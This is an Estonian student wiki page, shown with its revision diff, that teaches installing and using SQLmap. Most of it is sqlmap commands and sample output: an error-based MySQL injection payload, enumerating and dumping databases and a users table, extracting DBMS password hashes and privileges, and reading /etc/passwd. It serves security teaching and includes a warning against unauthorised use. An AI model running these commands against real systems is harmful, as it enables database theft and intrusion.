Sqlmap: Difference between revisions
From ICO wiki
Jump to navigationJump to search
mNo edit summary |
mNo edit summary |
||
| Line 81: | Line 81: | ||
==Kasutamine== | ==Kasutamine== | ||
''' | ''' | ||
''' | |||
====1. Andmebaasid ja tabelid==== | |||
''' | |||
1. Oletame, et tahame SQLmap'iga testida veebilehte. Selleks laseme SQLmap'il kõigepealt kontrollida, kas antud veebileht on nõrkusega SQL injektsiooni suhtes.[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51"</pre> | |||
Näidisväljund, milles näha opsüsteem, veebiserveri ja andmebaasi tüüp koos versiooninumbriga:[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>[*] starting at 12:10:33 | |||
[12:10:33] [INFO] resuming back-end DBMS 'mysql' | |||
[12:10:34] [INFO] testing connection to the target url | |||
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: | |||
--- | |||
Place: GET | |||
Parameter: id | |||
Type: error-based | |||
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause | |||
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) | |||
--- | |||
[12:10:37] [INFO] the back-end DBMS is MySQL | |||
web server operating system: FreeBSD | |||
web application technology: Apache 2.2.22 | |||
back-end DBMS: MySQL 5</pre> | |||
2. Kuna antud veebiserver on seega rünnatav, saab näiteks tagastada '''andmebaaside nimekirja''', kasutades võtit '''--dbs''':[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs</pre> | |||
Näidisväljund, mis näitab andmebaaside nimekirja:[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>[*] starting at 12:12:56 | |||
[12:12:56] [INFO] resuming back-end DBMS 'mysql' | |||
[12:12:57] [INFO] testing connection to the target url | |||
sqlmap identified the following injection points with a total of 0 HTTP(s) requests: | |||
--- | |||
Place: GET | |||
Parameter: id | |||
Type: error-based | |||
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause | |||
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) | |||
--- | |||
[12:13:00] [INFO] the back-end DBMS is MySQL | |||
web server operating system: FreeBSD | |||
web application technology: Apache 2.2.22 | |||
back-end DBMS: MySQL 5 | |||
[12:13:00] [INFO] fetching database names | |||
[12:13:00] [INFO] the SQL query used returns 2 entries | |||
[12:13:00] [INFO] resumed: information_schema | |||
[12:13:00] [INFO] resumed: safecosmetics | |||
available databases [2]: | |||
[*] information_schema | |||
[*] safecosmetics</pre> | |||
3. Leiame '''kõik tabelid''', mis asuvad andmebaasis "safecosmetics":[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics</pre> | |||
Näidisväljund:[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>[11:55:18] [INFO] the back-end DBMS is MySQL | |||
web server operating system: FreeBSD | |||
web application technology: Apache 2.2.22 | |||
back-end DBMS: MySQL 5 | |||
[11:55:18] [INFO] fetching tables for database: 'safecosmetics' | |||
[11:55:19] [INFO] heuristics detected web page charset 'ascii' | |||
[11:55:19] [INFO] the SQL query used returns 216 entries | |||
[11:55:20] [INFO] retrieved: acl_acl | |||
[11:55:21] [INFO] retrieved: acl_acl_sections | |||
........... more tables</pre> | |||
4. Leiame '''veerud tabelis''' "users" andmebaasis "safecosmetics":[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users</pre> | |||
Näidisväljund:[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>[12:17:39] [INFO] the back-end DBMS is MySQL | |||
web server operating system: FreeBSD | |||
web application technology: Apache 2.2.22 | |||
back-end DBMS: MySQL 5 | |||
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' | |||
[12:17:41] [INFO] heuristics detected web page charset 'ascii' | |||
[12:17:41] [INFO] the SQL query used returns 8 entries | |||
[12:17:42] [INFO] retrieved: id | |||
[12:17:43] [INFO] retrieved: int(11) | |||
[12:17:45] [INFO] retrieved: name | |||
[12:17:46] [INFO] retrieved: text | |||
[12:17:47] [INFO] retrieved: password | |||
[12:17:48] [INFO] retrieved: text | |||
....... | |||
[12:17:59] [INFO] retrieved: hash | |||
[12:18:01] [INFO] retrieved: varchar(128) | |||
Database: safecosmetics | |||
Table: users | |||
[8 columns] | |||
+-------------------+--------------+ | |||
| Column | Type | | |||
+-------------------+--------------+ | |||
| email | text | | |||
| hash | varchar(128) | | |||
| id | int(11) | | |||
| name | text | | |||
| password | text | | |||
| permission | tinyint(4) | | |||
| system_allow_only | text | | |||
| system_home | text | | |||
+-------------------+--------------+</pre> | |||
5. Leiame eelnevast '''tabelist andmed''':[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users</pre> | |||
Näidisväljund, mis on sarnane mysqldump käsule:[http://www.binarytides.com/sqlmap-hacking-tutorial/] | |||
<pre>+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | |||
| id | hash | name | email | password | permission | system_home | system_allow_only | | |||
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | |||
| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> | | |||
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+</pre> | |||
''' | |||
====2. Kasutajad==== | |||
''' | |||
Järgnev käsk tagastab infot kasutajate ja rollide kohta.[http://www.binarytides.com/hack-remote-database-sqlmap/] | |||
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10</pre> | |||
Näidisväljund:[http://www.binarytides.com/hack-remote-database-sqlmap/] | |||
<pre>.......... | |||
database management system users [5]: | |||
[*] ''@'localhost' | |||
[*] ''@'localhost.localdomain' | |||
[*] 'root'@'127.0.0.1' | |||
[*] 'root'@'localhost' | |||
[*] 'root'@'localhost.localdomain' | |||
............. | |||
database management system users password hashes: | |||
[*] [1]: | |||
password hash: NULL | |||
[*] root [2]: | |||
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | |||
password hash: NULL | |||
........ | |||
[*] %root% (administrator) [27]: | |||
privilege: ALTER | |||
privilege: ALTER ROUTINE | |||
privilege: CREATE | |||
privilege: CREATE ROUTINE | |||
privilege: CREATE TEMPORARY TABLES | |||
privilege: CREATE USER | |||
privilege: CREATE VIEW | |||
privilege: DELETE | |||
privilege: DROP | |||
privilege: EVENT | |||
privilege: EXECUTE | |||
privilege: FILE | |||
privilege: INDEX | |||
privilege: INSERT | |||
privilege: LOCK TABLES | |||
privilege: PROCESS | |||
privilege: REFERENCES | |||
privilege: RELOAD | |||
privilege: REPLICATION CLIENT | |||
privilege: REPLICATION SLAVE | |||
privilege: SELECT | |||
privilege: SHOW DATABASES | |||
privilege: SHOW VIEW | |||
privilege: SHUTDOWN | |||
privilege: SUPER | |||
privilege: TRIGGER | |||
privilege: UPDATE</pre> | |||
Leiame info hetkel kasutusel oleva kasutaja, andmebaasi ja hostinime kohta:[http://www.binarytides.com/hack-remote-database-sqlmap/] | |||
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10</pre> | |||
Näidisväljund:[http://www.binarytides.com/hack-remote-database-sqlmap/] | |||
<pre>........ | |||
[11:32:33] [INFO] the back-end DBMS is MySQL | |||
web server operating system: Linux Red Hat Enterprise 6 (Santiago) | |||
web application technology: PHP 5.3.3, Apache 2.2.15 | |||
back-end DBMS: MySQL 5.0.11 | |||
[11:32:33] [INFO] fetching current user | |||
[11:32:33] [INFO] retrieving the length of query output | |||
[11:32:33] [INFO] retrieved: 14 | |||
[11:32:38] [INFO] retrieved: root@localhost | |||
current user: 'root@localhost' | |||
[11:32:38] [INFO] fetching current database | |||
[11:32:38] [INFO] retrieving the length of query output | |||
[11:32:38] [INFO] retrieved: 5 | |||
[11:32:40] [INFO] resumed: profile_data | |||
current database: 'profile_data' | |||
[11:32:40] [INFO] fetching server hostname | |||
[11:32:40] [INFO] retrieving the length of query output | |||
[11:32:40] [INFO] retrieved: 21 | |||
[11:32:48] [INFO] retrieved: localhost.localdomain | |||
hostname: 'localhost.localdomain' | |||
[11:32:48] [INFO] testing if current user is DBA | |||
[11:32:48] [INFO] fetching current user | |||
current user is DBA: False</pre> | |||
''' | |||
====2. Failid==== | |||
''' | |||
Faili lugemine kui on olemas vajalikud õigused, näiteks /etc/passwd:[http://www.binarytides.com/hack-remote-database-sqlmap/] | |||
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10</pre> | |||
Revision as of 17:08, 14 May 2015
SQLmap
Autor: Elina Prudnikova
Rühm: A21
Mai 2015
Lühikirjeldus
SQLmap on avatud lähtekoodiga programm, mida kasutatakse SQL injektsiooni nõrkuste leidmiseks ja ärakasutamiseks, selleks et testida andmebaasiserverite turvalisust. [1]
SQLmap võimaldab näiteks: luua otseühendust andmebaasiga, alla laadida andmebaasi tabeleid, murda lihtsamaid paroole kasutades sõnastikupõhist rünnet, alla laadida või üles laadida faile andmebaasiserverist, käivitada käske andmebaasiserveris, eskaleerida kasutaja õigusi jne. [2]
NB! SQLmap'i kasutamine kellegi ründamiseks ilma mõlemapoolse nõusolekuta on kuritegu! Kasutajad võtavad täieliku vastutuse enda tegude eest ning programmi loojad ei vastuta võimaliku väärkasutuse või kahju eest!
Paigaldamine
SQLmap on operatsioonisüsteemist sõltumatu, kuna on kirjutatud keeles Python. Teda on võimalik kasutada nii Windowsis kui ka Linux/Unix all. [3]
1. Linux/Unix
SQLmap'i jaoks on kõigepealt vaja paigaldada Python 2.6 või 2.7 versioon.
1. Paigalda Python (Debian, Ubuntu).
sudo apt-get install python2.6
2. Kontrolli versiooni.
python --version
3. Seejärel alla laadida SQLmap.
wget from http://sqlmap.sourceforge.net/#download
4. Pakkida see lahti ja käivitada.
tar zxvf sqlmap-0.9.tar.gz cd sqlmap python sqlmap.py
5. Edukal paigaldamisel tagastab SQLmap:
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help
Abi paigaldamisel Linux/Unix all
2. Windows
1. Alla laadida ja paigaldada Python 2.6 või 2.7 kodulehelt: Python
2. Alla laadida zip fail SQLmap'i kodulehelt, pakkida see lahti. SQLmap Käsurealt liikuda kataloogi, kuhu see lahti pakiti ja käivitada.
C:\sqlmapproject-sqlmap-2defc30>python ./sqlmap.py Usage: ./sqlmap.py [options] sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wiza rd, --update, --purge-output or --dependencies), use -h for basic or -hh for adv anced help Press Enter to continue...
Kasutamine
1. Andmebaasid ja tabelid
1. Oletame, et tahame SQLmap'iga testida veebilehte. Selleks laseme SQLmap'il kõigepealt kontrollida, kas antud veebileht on nõrkusega SQL injektsiooni suhtes.[4]
python sqlmap.py -u "http://www.site.com/section.php?id=51"
Näidisväljund, milles näha opsüsteem, veebiserveri ja andmebaasi tüüp koos versiooninumbriga:[5]
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
2. Kuna antud veebiserver on seega rünnatav, saab näiteks tagastada andmebaaside nimekirja, kasutades võtit --dbs:[6]
python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
Näidisväljund, mis näitab andmebaaside nimekirja:[7]
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
3. Leiame kõik tabelid, mis asuvad andmebaasis "safecosmetics":[8]
python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
Näidisväljund:[9]
[11:55:18] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [11:55:18] [INFO] fetching tables for database: 'safecosmetics' [11:55:19] [INFO] heuristics detected web page charset 'ascii' [11:55:19] [INFO] the SQL query used returns 216 entries [11:55:20] [INFO] retrieved: acl_acl [11:55:21] [INFO] retrieved: acl_acl_sections ........... more tables
4. Leiame veerud tabelis "users" andmebaasis "safecosmetics":[10]
python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
Näidisväljund:[11]
[12:17:39] [INFO] the back-end DBMS is MySQL web server operating system: FreeBSD web application technology: Apache 2.2.22 back-end DBMS: MySQL 5 [12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics' [12:17:41] [INFO] heuristics detected web page charset 'ascii' [12:17:41] [INFO] the SQL query used returns 8 entries [12:17:42] [INFO] retrieved: id [12:17:43] [INFO] retrieved: int(11) [12:17:45] [INFO] retrieved: name [12:17:46] [INFO] retrieved: text [12:17:47] [INFO] retrieved: password [12:17:48] [INFO] retrieved: text ....... [12:17:59] [INFO] retrieved: hash [12:18:01] [INFO] retrieved: varchar(128) Database: safecosmetics Table: users [8 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | email | text | | hash | varchar(128) | | id | int(11) | | name | text | | password | text | | permission | tinyint(4) | | system_allow_only | text | | system_home | text | +-------------------+--------------+
5. Leiame eelnevast tabelist andmed:[12]
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
Näidisväljund, mis on sarnane mysqldump käsule:[13]
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | id | hash | name | email | password | permission | system_home | system_allow_only | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+ | 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> | +----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
2. Kasutajad
Järgnev käsk tagastab infot kasutajate ja rollide kohta.[14]
python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
Näidisväljund:[15]
..........
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL
........
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
Leiame info hetkel kasutusel oleva kasutaja, andmebaasi ja hostinime kohta:[16]
python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
Näidisväljund:[17]
........ [11:32:33] [INFO] the back-end DBMS is MySQL web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 [11:32:33] [INFO] fetching current user [11:32:33] [INFO] retrieving the length of query output [11:32:33] [INFO] retrieved: 14 [11:32:38] [INFO] retrieved: root@localhost current user: 'root@localhost' [11:32:38] [INFO] fetching current database [11:32:38] [INFO] retrieving the length of query output [11:32:38] [INFO] retrieved: 5 [11:32:40] [INFO] resumed: profile_data current database: 'profile_data' [11:32:40] [INFO] fetching server hostname [11:32:40] [INFO] retrieving the length of query output [11:32:40] [INFO] retrieved: 21 [11:32:48] [INFO] retrieved: localhost.localdomain hostname: 'localhost.localdomain' [11:32:48] [INFO] testing if current user is DBA [11:32:48] [INFO] fetching current user current user is DBA: False
2. Failid
Faili lugemine kui on olemas vajalikud õigused, näiteks /etc/passwd:[18]
python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
